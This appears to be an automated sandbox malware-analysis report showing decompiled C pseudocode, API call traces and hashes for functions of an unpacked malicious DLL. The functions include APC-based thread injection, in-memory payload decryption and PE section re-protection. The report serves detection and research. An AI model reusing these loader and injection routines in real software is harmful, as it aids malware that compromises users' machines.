                                                                                                                                                                                • Part of subcall function 66DB18D1: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000), ref: 66DB192E
                                                                                                                                                                                • Part of subcall function 66DB18D1: memset.NTDLL ref: 66DB1950
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
                                                                                                                                                                              • Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1632424568-0
                                                                                                                                                                              • Opcode ID: c24b95907f299668a7675ea3b55f625c0dc62a0185f4bf5ce597c008bb9af660
                                                                                                                                                                              • Instruction ID: ac02a517394bf4b824812371b47fd9c6491a3447c2d5047edf5142451f7b74c1
                                                                                                                                                                              • Opcode Fuzzy Hash: c24b95907f299668a7675ea3b55f625c0dc62a0185f4bf5ce597c008bb9af660
                                                                                                                                                                              • Instruction Fuzzy Hash: 202103F190021AEFEB10DF69CC40E5A77EDEB46684B014615E916C731DE730E911CBA4
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 66DB1E04, Relevance: 9.1, APIs: 6, Instructions: 71memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                              			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x66db4188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x66db418c;
						if( *0x66db418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x66db4198;
								if( *0x66db4198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x66db418c);
						}
						HeapDestroy( *0x66db4190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x66db4188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x66db4190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x66db41b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E66DB1CA4(E66DB1D32, E66DB1EE0(_a12, 1, 0x66db4198, _t41));
							 *0x66db418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












                                                                                                                                                                              0x66db1e07
                                                                                                                                                                              0x66db1e13
                                                                                                                                                                              0x66db1e15
                                                                                                                                                                              0x66db1e18
                                                                                                                                                                              0x66db1e8e
                                                                                                                                                                              0x66db1e94
                                                                                                                                                                              0x66db1e96
                                                                                                                                                                              0x66db1e98
                                                                                                                                                                              0x66db1e9e
                                                                                                                                                                              0x66db1ea0
                                                                                                                                                                              0x66db1ea5
                                                                                                                                                                              0x66db1ea8
                                                                                                                                                                              0x66db1eb3
                                                                                                                                                                              0x66db1eb5
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1eb7
                                                                                                                                                                              0x66db1eba
                                                                                                                                                                              0x66db1ebc
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1ebc
                                                                                                                                                                              0x66db1ec4
                                                                                                                                                                              0x66db1ec4
                                                                                                                                                                              0x66db1ed0
                                                                                                                                                                              0x66db1ed0
                                                                                                                                                                              0x66db1e1a
                                                                                                                                                                              0x66db1e1b
                                                                                                                                                                              0x66db1e3b
                                                                                                                                                                              0x66db1e41
                                                                                                                                                                              0x66db1e43
                                                                                                                                                                              0x66db1e48
                                                                                                                                                                              0x66db1e84
                                                                                                                                                                              0x66db1e84
                                                                                                                                                                              0x66db1e4a
                                                                                                                                                                              0x66db1e52
                                                                                                                                                                              0x66db1e59
                                                                                                                                                                              0x66db1e63
                                                                                                                                                                              0x66db1e6f
                                                                                                                                                                              0x66db1e76
                                                                                                                                                                              0x66db1e7b
                                                                                                                                                                              0x66db1e80
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1e80
                                                                                                                                                                              0x66db1e7b
                                                                                                                                                                              0x66db1e48
                                                                                                                                                                              0x66db1e1b
                                                                                                                                                                              0x66db1edd

                                                                                                                                                                              APIs
                                                                                                                                                                              • InterlockedIncrement.KERNEL32(66DB4188), ref: 66DB1E26
                                                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 66DB1E3B
                                                                                                                                                                                • Part of subcall function 66DB1CA4: CreateThread.KERNELBASE(00000000,00000000,00000000,?,66DB4198,66DB1E74), ref: 66DB1CBB
                                                                                                                                                                                • Part of subcall function 66DB1CA4: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 66DB1CD0
                                                                                                                                                                                • Part of subcall function 66DB1CA4: GetLastError.KERNEL32(00000000), ref: 66DB1CDB
                                                                                                                                                                                • Part of subcall function 66DB1CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 66DB1CE5
                                                                                                                                                                                • Part of subcall function 66DB1CA4: CloseHandle.KERNEL32(00000000), ref: 66DB1CEC
                                                                                                                                                                                • Part of subcall function 66DB1CA4: SetLastError.KERNEL32(00000000), ref: 66DB1CF5
                                                                                                                                                                              • InterlockedDecrement.KERNEL32(66DB4188), ref: 66DB1E8E
                                                                                                                                                                              • SleepEx.KERNEL32(00000064,00000001), ref: 66DB1EA8
                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 66DB1EC4
                                                                                                                                                                              • HeapDestroy.KERNEL32 ref: 66DB1ED0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
                                                                                                                                                                              • Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2110400756-0
                                                                                                                                                                              • Opcode ID: db79995f28318d59364169e920ee822974941228e628dfbb527894a9bda5cb16
                                                                                                                                                                              • Instruction ID: c5908ce77b9be4742aa774ae8183c71d84a4d43fae24e663615185f84358abb2
                                                                                                                                                                              • Opcode Fuzzy Hash: db79995f28318d59364169e920ee822974941228e628dfbb527894a9bda5cb16
                                                                                                                                                                              • Instruction Fuzzy Hash: 4B2189F1E10215EBEF00CFAACC84A4E7BBAFB9A7A17150029E616D254CE730CD14CB60
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 66DB1CA4, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E66DB1CA4(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x66db41cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}








                                                                                                                                                                              0x66db1cbb
                                                                                                                                                                              0x66db1cc1
                                                                                                                                                                              0x66db1cc5
                                                                                                                                                                              0x66db1cd0
                                                                                                                                                                              0x66db1cd8
                                                                                                                                                                              0x66db1ce1
                                                                                                                                                                              0x66db1ce5
                                                                                                                                                                              0x66db1cec
                                                                                                                                                                              0x66db1cf3
                                                                                                                                                                              0x66db1cf5
                                                                                                                                                                              0x66db1cfb
                                                                                                                                                                              0x66db1cd8
                                                                                                                                                                              0x66db1cff

                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,00000000,?,66DB4198,66DB1E74), ref: 66DB1CBB
                                                                                                                                                                              • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 66DB1CD0
                                                                                                                                                                              • GetLastError.KERNEL32(00000000), ref: 66DB1CDB
                                                                                                                                                                              • TerminateThread.KERNEL32(00000000,00000000), ref: 66DB1CE5
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 66DB1CEC
                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 66DB1CF5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
                                                                                                                                                                              • Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3832013932-0
                                                                                                                                                                              • Opcode ID: 8becf8ce990dc4c847b6700123f17f44de587aedbf09baeaec64893c066b351d
                                                                                                                                                                              • Instruction ID: de17e442b59181d7e7725f938708211e80b3a4ed21d2e6d6dd0b16db465ed371
                                                                                                                                                                              • Opcode Fuzzy Hash: 8becf8ce990dc4c847b6700123f17f44de587aedbf09baeaec64893c066b351d
                                                                                                                                                                              • Instruction Fuzzy Hash: B3F082B2604631FBEB115FA68C0CF4BBF6AFF8A751F020514F70591149C7318C11AB95
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 66DB15A3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                                              			E66DB15A3(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x66db41b0;
				_t39 = E66DB1A4B(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x66db41cc;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x66db5137; // 0x66db5137
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E66DB1D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x66db41cc = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}























                                                                                                                                                                              0x66db15aa
                                                                                                                                                                              0x66db15ba
                                                                                                                                                                              0x66db15c1
                                                                                                                                                                              0x66db15c4
                                                                                                                                                                              0x66db15d9
                                                                                                                                                                              0x66db15e0
                                                                                                                                                                              0x66db15e5
                                                                                                                                                                              0x66db15f6
                                                                                                                                                                              0x66db15f9
                                                                                                                                                                              0x66db1601
                                                                                                                                                                              0x66db1604
                                                                                                                                                                              0x66db16ae
                                                                                                                                                                              0x66db160a
                                                                                                                                                                              0x66db160a
                                                                                                                                                                              0x66db160e
                                                                                                                                                                              0x66db1676
                                                                                                                                                                              0x66db1610
                                                                                                                                                                              0x66db1610
                                                                                                                                                                              0x66db1613
                                                                                                                                                                              0x66db1615
                                                                                                                                                                              0x66db161d
                                                                                                                                                                              0x66db1620
                                                                                                                                                                              0x66db1623
                                                                                                                                                                              0x66db162b
                                                                                                                                                                              0x66db1633
                                                                                                                                                                              0x66db1634
                                                                                                                                                                              0x66db1635
                                                                                                                                                                              0x66db163c
                                                                                                                                                                              0x66db163c
                                                                                                                                                                              0x66db1650
                                                                                                                                                                              0x66db1655
                                                                                                                                                                              0x66db165e
                                                                                                                                                                              0x66db1665
                                                                                                                                                                              0x66db1668
                                                                                                                                                                              0x66db166c
                                                                                                                                                                              0x66db1671
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1628
                                                                                                                                                                              0x66db1628
                                                                                                                                                                              0x66db1673
                                                                                                                                                                              0x66db1680
                                                                                                                                                                              0x66db1695
                                                                                                                                                                              0x66db1682
                                                                                                                                                                              0x66db168b
                                                                                                                                                                              0x66db1690
                                                                                                                                                                              0x66db16a6
                                                                                                                                                                              0x66db16a6
                                                                                                                                                                              0x66db16b5
                                                                                                                                                                              0x66db16bb

                                                                                                                                                                              APIs
                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 66DB15F9
                                                                                                                                                                              • memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,66DB17EC), ref: 66DB168B
                                                                                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 66DB16A6
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
                                                                                                                                                                              • Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Virtual$AllocFreememcpy
                                                                                                                                                                              • String ID: Mar 26 2021
                                                                                                                                                                              • API String ID: 4010158826-2175073649
                                                                                                                                                                              • Opcode ID: 41d20c5052719de4a54109e4fbcb49d92b01452a49b0bbf47bf33c7dc4e1b843
                                                                                                                                                                              • Instruction ID: e909f4425caa8d572e70880e5048545842fbb8450d52ffe53552547aef38029c
                                                                                                                                                                              • Opcode Fuzzy Hash: 41d20c5052719de4a54109e4fbcb49d92b01452a49b0bbf47bf33c7dc4e1b843
                                                                                                                                                                              • Instruction Fuzzy Hash: 913130B1E00219EBDB00CF99CC81ADEBBB5FF49744F148169E905AB249D771AA058FD0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 66DB1D32, Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                                              			E66DB1D32(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E66DB17A7(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}







                                                                                                                                                                              0x66db1d3b
                                                                                                                                                                              0x66db1d40
                                                                                                                                                                              0x66db1d4e
                                                                                                                                                                              0x66db1d53
                                                                                                                                                                              0x66db1d53
                                                                                                                                                                              0x66db1d59
                                                                                                                                                                              0x66db1d5e
                                                                                                                                                                              0x66db1d62
                                                                                                                                                                              0x66db1d66
                                                                                                                                                                              0x66db1d66
                                                                                                                                                                              0x66db1d70
                                                                                                                                                                              0x66db1d79

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 66DB1D35
                                                                                                                                                                              • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 66DB1D40
                                                                                                                                                                              • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 66DB1D53
                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 66DB1D66
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
                                                                                                                                                                              • Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1452675757-0
                                                                                                                                                                              • Opcode ID: 2c0ae6bb7ee504249ac47ba55eeaefb415ba824c806c4ab308777a0299a79d0c
                                                                                                                                                                              • Instruction ID: a6b41c4a6dc3f59a75c19700aa6ae3fc4403215a979f8df3070fabf350559c05
                                                                                                                                                                              • Opcode Fuzzy Hash: 2c0ae6bb7ee504249ac47ba55eeaefb415ba824c806c4ab308777a0299a79d0c
                                                                                                                                                                              • Instruction Fuzzy Hash: 0BE09BB1715320ABA7015F294C84E5F6B5DDFD33317130335F625D21D8DB645C0595A5
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 66DB1030, Relevance: 4.6, APIs: 3, Instructions: 68memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                                              			E66DB1030(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x66db41cc;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}












                                                                                                                                                                              0x66db103a
                                                                                                                                                                              0x66db1047
                                                                                                                                                                              0x66db104d
                                                                                                                                                                              0x66db1059
                                                                                                                                                                              0x66db1069
                                                                                                                                                                              0x66db106b
                                                                                                                                                                              0x66db1073
                                                                                                                                                                              0x66db1108
                                                                                                                                                                              0x66db110f
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1079
                                                                                                                                                                              0x66db1079
                                                                                                                                                                              0x66db1079
                                                                                                                                                                              0x66db107d
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1089
                                                                                                                                                                              0x66db108d
                                                                                                                                                                              0x66db10b1
                                                                                                                                                                              0x66db10b5
                                                                                                                                                                              0x66db10c9
                                                                                                                                                                              0x66db10c9
                                                                                                                                                                              0x66db10cf
                                                                                                                                                                              0x66db10de
                                                                                                                                                                              0x66db10e2
                                                                                                                                                                              0x66db10ea
                                                                                                                                                                              0x66db10ea
                                                                                                                                                                              0x66db10f2
                                                                                                                                                                              0x66db10f5
                                                                                                                                                                              0x66db1102
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1102
                                                                                                                                                                              0x66db10bd
                                                                                                                                                                              0x66db10c1
                                                                                                                                                                              0x66db10c7
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db10c7
                                                                                                                                                                              0x66db1095
                                                                                                                                                                              0x66db1099
                                                                                                                                                                              0x66db10a3
                                                                                                                                                                              0x66db109b
                                                                                                                                                                              0x66db109b
                                                                                                                                                                              0x66db109b
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1099
                                                                                                                                                                              0x00000000

                                                                                                                                                                              APIs
                                                                                                                                                                              • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 66DB1069
                                                                                                                                                                              • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 66DB10DE
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 66DB10E4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
                                                                                                                                                                              • Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ProtectVirtual$ErrorLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1469625949-0
                                                                                                                                                                              • Opcode ID: 85039a82b22c49f32865e885e19b7e77789353bbc9ecb7cb8fe25881786efaa9
                                                                                                                                                                              • Instruction ID: d99e6ff677cc2fb44b59525c154fe1f3d2b3e8930040dcb4bd71d200df6dc5ae
                                                                                                                                                                              • Opcode Fuzzy Hash: 85039a82b22c49f32865e885e19b7e77789353bbc9ecb7cb8fe25881786efaa9
                                                                                                                                                                              • Instruction Fuzzy Hash: DF215EB1C00206DFCB14CF96C881AAAF7F5FF44359F008859D10797489E378A6A9CB51
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 66DB16EC, Relevance: 4.6, APIs: 3, Instructions: 60stringthreadCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 80%
                                                                                                                                                                              			E66DB16EC() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t23;
				int _t24;
				void* _t28;
				intOrPtr* _t30;
				signed int _t34;
				intOrPtr _t36;

				_push(0);
				_push(0x66db41c4);
				_push(1);
				_push( *0x66db41d0 + 0x66db5089);
				 *0x66db41c0 = 0xc;
				 *0x66db41c8 = 0; // executed
				L66DB14D8(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E66DB1112( &_v44,  &_v28,  *0x66db41cc ^ 0xfd7cd1cf) == 0) {
					_t23 = 0xb;
					L7:
					ExitThread(_t23);
				}
				_t24 = lstrlenW( *0x66db41b8);
				_t7 = _t24 + 2; // 0x2
				_t10 = _t24 + _t7 + 8; // 0xa
				_t28 = E66DB1979(_t36, _t10,  &_v48,  &_v52); // executed
				if(_t28 == 0) {
					_t30 = _v52;
					 *_t30 = 0;
					if( *0x66db41b8 == 0) {
						 *((short*)(_t30 + 4)) = 0;
					} else {
						E66DB2112(_t40, _t30 + 4);
					}
				}
				_t23 = E66DB1236(_v44); // executed
				goto L7;
			}













                                                                                                                                                                              0x66db16fe
                                                                                                                                                                              0x66db16ff
                                                                                                                                                                              0x66db1704
                                                                                                                                                                              0x66db170c
                                                                                                                                                                              0x66db170d
                                                                                                                                                                              0x66db1717
                                                                                                                                                                              0x66db171d
                                                                                                                                                                              0x66db1726
                                                                                                                                                                              0x66db172b
                                                                                                                                                                              0x66db1749
                                                                                                                                                                              0x66db179e
                                                                                                                                                                              0x66db179f
                                                                                                                                                                              0x66db17a0
                                                                                                                                                                              0x66db17a0
                                                                                                                                                                              0x66db1751
                                                                                                                                                                              0x66db1757
                                                                                                                                                                              0x66db1765
                                                                                                                                                                              0x66db1769
                                                                                                                                                                              0x66db1770
                                                                                                                                                                              0x66db1778
                                                                                                                                                                              0x66db177c
                                                                                                                                                                              0x66db177e
                                                                                                                                                                              0x66db178d
                                                                                                                                                                              0x66db1780
                                                                                                                                                                              0x66db1786
                                                                                                                                                                              0x66db1786
                                                                                                                                                                              0x66db177e
                                                                                                                                                                              0x66db1795
                                                                                                                                                                              0x00000000

                                                                                                                                                                              APIs
                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,66DB41C4,00000000), ref: 66DB171D
                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?), ref: 66DB1751
                                                                                                                                                                                • Part of subcall function 66DB1979: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,66DB176E,0000000A,?,?), ref: 66DB1986
                                                                                                                                                                                • Part of subcall function 66DB1979: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 66DB199C
                                                                                                                                                                                • Part of subcall function 66DB1979: _snwprintf.NTDLL ref: 66DB19C1
                                                                                                                                                                                • Part of subcall function 66DB1979: CreateFileMappingW.KERNELBASE(000000FF,66DB41C0,00000004,00000000,?,?), ref: 66DB19E6
                                                                                                                                                                                • Part of subcall function 66DB1979: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,66DB176E,0000000A,?), ref: 66DB19FD
                                                                                                                                                                                • Part of subcall function 66DB1979: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,66DB176E,0000000A), ref: 66DB1A32
                                                                                                                                                                              • ExitThread.KERNEL32 ref: 66DB17A0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
                                                                                                                                                                              • Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp Download File
